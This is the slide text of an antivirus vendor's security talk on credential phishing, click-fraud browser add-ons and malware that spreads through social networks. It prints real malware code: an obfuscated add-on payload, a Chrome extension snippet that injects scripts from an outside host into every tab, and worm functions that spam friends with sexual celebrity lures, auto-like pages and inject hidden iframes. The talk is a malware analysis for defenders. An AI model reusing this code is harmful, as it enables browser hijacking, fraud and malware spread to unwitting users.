Every Click Counts (But All the Money Goes to Me)

Lukáš HasíkJan Širmer

Agenda

• Simple way to steal credentials• Click for me• Executable clicker• Data from AVAST CommunityIQ userbase• Summary• Questions

Simple way to steal credentials

Simple way to steal credentials

credentials

Simple way to steal credentials

Simple way to steal credentials

User feels confident – s/he received a confirmation

Simple way to steal credentials

And some users really provided they real credentials…

Click for me

Executable clicker

Click for me

Flash player warning

Software Installation

Payloads

Payload in IE

Payloads for FF and Chromeeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){

whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};

while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}

('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ;2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25||2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25||2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")==""){2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65)){2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71\'\'80&68\'24&76`74}5", 17,8)}},64:9(){36 10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="") {2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101; 102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26){63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28 103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15){34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26){15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)|0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15){39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));

Unpacked dean

Change setting in browser

TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9

TestAddon.ch default string

TestAddon.date user set string 1340624313

TestAddon.guid user set string 3c94f90903f031a799162872a55742e8

TestAddon.int user set string 60

TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5

j.php content

function updated(tabId, changeInfo, tab){ if(changeInfo.status == 'complete'){ chrome.tabs.executeScript(tabId, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm6.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null); } } chrome.tabs.onUpdated.addListener(updated); chrome.tabs.getAllInWindow(null,function(tabs){ for(var i=0;i < tabs.length;i++){ chrome.tabs.executeScript(tabs[i].id, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm76.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null); } });

js_f.php

• Two different ways1. Spreading malware to other people and works as a clicker

2. Only clicker

Spreading malware

• Script updates the victim’s Facebook and twitter status by posting new status messages

Spreading malware

var videos = new Array(10);

videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772");

var flk = Array();

if ((1 == 1)) {

var randomnumber = Math.floor(Math.random() * 100);

if (randomnumber > 0) {

Spreading malware

var uri = "http://tol.co/5q";

if ((document.location.href.search("tagged.com") > -1)) {

var ids = get_friends_t(1);

if (ids.length > 0) {

for (var i in ids) {

send_msg(uri, ids[i], "2222")

}

} else {

post_item("LOL Miley Cyrus got caught having s3x " + uri, "2222")

}

}

Functionality

function likepage(pageid) {

var likepost = "fbpage_id=" + pageid + "&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet_header&post_form_id=" + fid + "&fb_dtsg=" + fbdt + "&lsd&post_form_id_source=AsyncRequest";

var likepage = new XMLHttpRequest();

likepage.open("POST", "/ajax/pages/fan_status.php?__a=1");

likepage.send(likepost)

}

Functionality

function get_online_friends(limit) {

var friends = get_friends(limit);

var friends = make_array(friends);

friends.sort();

var postfields = "user=" + uid;

for (var i = 0; i < friends.length; i++) {

postfields += "&available_user_info_ids[" + i + "]=" + friends[i]

}

Functionality

function get_solved_captcha(extra_challenge_params, opt) {

var output = new Array(3);

var post = new XMLHttpRequest();

post.open("GET", "http://mp56a.com/fn/cs/api/s_c.php?u=" + escape(extra_challenge_params), false);

post.send();

if (post.readyState == 4 && post.status == 200) {

data = eval('(' + post.responseText + ')');

console.log(data);

post[1] = data.key;

post[2] = data.challenge

}

Create injected iframe function createIframe(src) { var ifr = document.createElement("iframe"); ifr.setAttribute("src", src); ifr.style.position = "absolute"; ifr.style.top = "0"; ifr.style.left = "0"; ifr.style.width = "100%"; ifr.style.height = "100%"; document.body.appendChild(ifr) } function get_img_src(src, no) { x = src.getElementsByTagName("img"); return x[no].id } function make_dom(src) { var tempDiv = document.createElement("div"); tempDiv.innerHTML = src; return tempDiv }

Clicker

• BHO, Firefox and Chrome payloads contain link to site like

http://resultsz.com/search/anticheat6.php?username=foreste

• There is hosted list of sites used by all of those “clickers” for injecting hidden iframe with every visited site and earning money to the blackhat.

Summary

• Be aware of social engineering– Even simple attempts can be successful

• Social networks are used for spreading malware– More user == more efficiency

• Trendy topics, celebrities and latest news are often start point for these infection vectors

Questions and Answers

Thank you

Jan Sirmer (sirmer@avast.com)

Senior Virus Analyst

Lukas Hasik (hasik@avast.com)

QA Director